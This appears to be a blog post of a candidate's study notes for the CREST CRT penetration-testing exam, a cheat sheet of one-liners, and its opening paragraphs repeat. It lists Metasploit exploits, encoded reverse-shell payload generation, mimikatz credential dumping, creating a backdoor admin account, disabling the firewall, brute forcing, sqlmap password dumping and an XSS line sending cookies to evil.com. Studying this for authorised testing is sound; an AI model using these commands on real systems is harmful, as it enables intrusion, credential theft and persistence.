I'm going to be taking the CREST CRT exam in January and wanted to share my preparation notes with the world to save everyone else the time and effort of digging up this information to pass the exam.
Note: I have not taken the exam yet, I do not know the answers and am in no way affiliated with CREST.
Note Note: I passed the exam. Due to confidentiality reasons I can't provide any hints I will however leave this post up to assist future participants :)
What have we gota do?
First things first, the official CREST site and CRT page is here:
http://www.crest-approved.org/information-security-testers/registered-tester/index.html
To quote the official documentation - "The Certification Examination has two components: a multiple choice written question section and a practical assessment which is also examined using multiple choice answers. The practical assessment tests candidates’ hands-on penetration testing methodology and skills against reference networks, hosts and applications."
For the "written question" section I'd recommend Wikipedia or some SANS/CEH material. For the practical side of things see below.
Getting hands-on!
Note Note: I passed the exam. Due to confidentiality reasons I can't provide any hints I will however leave this post up to assist future participants :)
What have we gota do?
First things first, the official CREST site and CRT page is here:
http://www.crest-approved.org/information-security-testers/registered-tester/index.html
To quote the official documentation - "The Certification Examination has two components: a multiple choice written question section and a practical assessment which is also examined using multiple choice answers. The practical assessment tests candidates’ hands-on penetration testing methodology and skills against reference networks, hosts and applications."
For the "written question" section I'd recommend Wikipedia or some SANS/CEH material. For the practical side of things see below.
Getting hands-on!
My goal during the practical exam is to be as quick and efficient as possible. I want to minimize time spent analyzing results, configuring tools or writing custom stuff and maximize time spent answering questions! I plan to use a Windows box with Kali Linux VM. Below is my full list of tools and one-liners:
RECON AND ENUMERATION
RECON AND ENUMERATION
| Command | Description |
|---|---|
| nmap -T4 -A -Pn -oA scan -v 192.168.1.1-254 | Full scan |
| for i in 21 22 23 80 443 445;do cat scan.gnmap|grep " $i/open"|cut -d " " -f2 > $i.txt;done | Parse results into txt files per port |
| nmap -T4 -v -oA myshares --script smb-enum-shares --script-args smbuser=pwndizzle,smbpass=mypassword -p445 192.168.1.1-254 | Check for open shares |
| dig axfr example.com @ns1.example.com | DNS zone transfer (Linux) |
| tcp.port, tcp.srcport, ip.src, ip.dst, or, and | Wireshark syntax |
| tcpdump tcp port 80 -w output.pcap -i eth0 | Tcpdump syntax |
| mount 192.168.1.1:/share /mnt/nfs | Mount an NFS share |
| mount -o nolock -t nfs -o proto=tcp,port=2049 172.16.1.1:/ /mnt | Mount an NFS share |
| mount -t cifs -o username=<user>,password=<password>,domain=example.com //WIN_PC_IP/<share name> /mnt/windows | Mount a Windows share |
| net use x: \\filesvr001\folder1 <password> /user:domain01\jsmith /savecred /p:no | Mount a Windows share |
| net use \\<target>\IPC$ "" /u:"" | Null session |
| rpcclient -U "" <target> | Null session |
| enum4linux.pl 192.168.1.20 | Retrieve domain info |
| onesixtyone -c names -i snmphosts | SNMP enum |
| snmpcheck -t 172.10.1.1 -c public | SNMP enum |
| nslookup -> set type=any -> ls -d <domain> | DNS zone transfer (Windows) |
| nmap --script=smb-check-vulns --script-args=unsafe=1 -p445 <host> | SMB vuln scan |
METASPLOIT
| Command | Description |
|---|---|
| use auxiliary/scanner/http/dir_scanner | Scan for directories |
| use auxiliary/scanner/http/jboss_vulnscan | JBoss scan |
| use exploit/multi/http/jboss_maindeployer | JBoss deploy |
| use auxiliary/scanner/mssql/mssql_login | MSSQL cred scan |
| use exploit/windows/mssql/mssql_payload | MSSQL payload |
| use auxiliary/scanner/mysql/mysql_version | MySQL version scan |
| use auxiliary/scanner/mysql/mysql_login | MySQL login |
| use auxiliary/scanner/oracle/oracle_login | Oracle login |
| use exploit/windows/dcerpc/ms03_026_dcom | eazymode |
| use exploit/windows/smb/ms06_040_netapi | eazymode |
| use exploit/windows/smb/ms08_067_netapi | eazymode |
| use exploit/windows/smb/ms09_050_smb2_negotiate_func_index | eazymode |
| run post/windows/gather/win_privs | Show privs of current user |
| use exploit/windows/local/bypassuac (check if x86/64 and set target) | Bypass uac on win7+ |
| load mimikatz -> wdigest | Dump creds |
| load incongnito -> list_tokens -> impersonate_token | Use tokens |
| use post/windows/gather/credentials/gpp | GPP |
| run post/windows/gather/local_admin_search_enum | Test other machines |
| msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.0.1 LPORT=4445 R | msfencode -t exe -e x86/shikata_ga_nai -c 5 > custom.exe | Standalone meterpreter |
| use exploit/multi/script/web_delivery | Powershell payload delivery |
| post/windows/manage/powershell/exec_powershell | Upload and run a PS script through a session |
| msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.1.3.19 LPORT=4444 -a x86 -f exe -e x86/shikata_ga_nai -b '\x00' -i 3 > meter.exe | Generate standalone payload |
WINDOWS COMMANDS
https://docs.google.com/document/d/1U10isynOpQtrIK6ChuReu-K1WHTJm4fgG3joiuz43rw/edit
ipconfig /all
|
Displays the full information about your NIC’s.
|
ipconfig /displaydns
|
Displays your local DNS cache.
|
netstat -nabo
|
Lists ports / connections with corresponding process (-b), don’t perform looking (-n), all connections (-a) and owning process ID (-o)
|
netstat -r
|
Displays the routing table
|
netstat -anob | findstr “services, process or port”
|
The “b” flag makes the command take longer but will output the process name using each of the connections.
|
netsh diag show all
|
{XP only} Shows information on network services and adapters
|
net view
|
Queries NBNS/SMB (SAMBA) and tries to find all hosts in your current workgroup or domain.
|
net view /domain
|
List all domains available to the host
|
net view /domain:otherdomain
|
Queries NBNS/SMB (SAMBA) and tries to find all hosts in the ‘otherdomain’
|
net user %USERNAME% /domain
|
Pulls information on the current user, if they are a domain user. If you are a local user then you just drop the /domain. Important things to note are login times, last time changed password, logon scripts, and group membership
|
net user /domain
|
Lists all of the domain users
|
net accounts
|
Prints the password policy for the local system. This can be different and superseded by the domain policy.
|
net accounts /domain
|
Prints the password policy for the domain
|
net localgroup administrators
|
Prints the members of the Administrators local group
|
net localgroup administrators /domain
|
as this was supposed to use localgroup & domain, this actually another way of getting *current* domain admins
|
net group “Domain Admins” /domain
|
Prints the members of the Domain Admins group
|
net group “Enterprise Admins” /domain
|
Prints the members of the Enterprise Admins group
|
net group “Domain Controllers” /domain
|
Prints the list of Domain Controllers for the current domain
|
net share
|
Displays your currently shared SMB entries, and what path(s) they point to
|
net session | find / “\\”
| |
arp -a
|
Lists all the systems currently in the machine’s ARP table.
|
route print
|
Prints the machine’s routing table. This can be good for finding other networks and static routes that have been put in place
|
whoami
|
View the current user
|
tasklist /v
|
List processes
|
taskkill /F /IM "cmd.exe"
|
Kill a process by its name
|
net user hacker hacker /add
|
Creates a new local (to the victim) user called ‘hacker’ with the password of ‘hacker’
|
net localgroup administrators hacker /add
|
Adds the new user ‘hacker’ to the local administrators group
|
net share nothing$=C:\ /grant:hacker,FULL /unlimited
|
Shares the C drive (you can specify any drive) out as a Windows share and grants the user ‘hacker’ full rights to access, or modify anything on that drive.
One thing to note is that in newer (will have to look up exactly when, I believe since XP SP2) windows versions, share permissions and file permissions are separated. Since we added our selves as a local admin this isn’t a problem but it is something to keep in mind
|
net user username /active:yes /domain
|
Changes an inactive / disabled account to active. This can useful for re-enabling old domain admins to use, but still puts up a red flag if those accounts are being watched.
|
netsh firewall set opmode disable
|
Disables the local windows firewall
|
wmic useraccount get name,sid - Retrieve name and sid from command line.
LINUX COMMANDS
| Command | Description |
|---|---|
| apt-get install finger rsh-client jxplorer sipcalc | Finger not installed in Kali by default |
| apt-get install rsh-client | R-tools not installed in Kali by default |
| uname -a | Kernel version |
| cat /etc/<distro>-release | Release version |
| showrev -p | Revision |
| rlogin -l <user> <target> | rlogin |
| rsh <target> <command> | rsh |
| find / -perm +6000 -type f -exec ls -ld {} \; > setuid.txt & | Find setuid binaries |
| finger <username>@<ip> | Retrieve user info |
| mysql -h <ip> -u <user> -p <password> | Connect to mysql |
| oscanner -s <ip> -r <repfile> | Oracle scanner |
PASSWORD GUESSING
| Command | Description |
|---|---|
| hydra -L users -P passwords -M 21.txt ftp | Brute ftp |
| hydra -L users -P passwords -M 22.txt ssh | Brute ssh |
| hydra -L users -P passwords -M 445.txt smb | Brute smb |
| User List |
|---|
| root |
| admin |
| administrator |
| manager |
| crest |
| crt |
| user |
PASSWORD CRACKING
| Command | Description |
|---|---|
| john --wordlist=/usr/share/wordlists/rockyou.txt hashes | JTR default |
WEB APP
| Command | Description |
|---|---|
| document.write('<img src="http://evil.com/x.gif?cookie=' + document.cookie + '" />) | XSS steal cookie |
| sqlmap -u <target> -p PARAM --data=POSTDATA --cookie=COOKIE --level=3 --current-user --current-db --passwords --file-read="/var/www/test.php" | Targeted scan |
| sqlmap -u http://example.com --forms --batch --crawl=10 --cookie=jsessionid=12345 --level=5 --risk=3 | Automated scan |
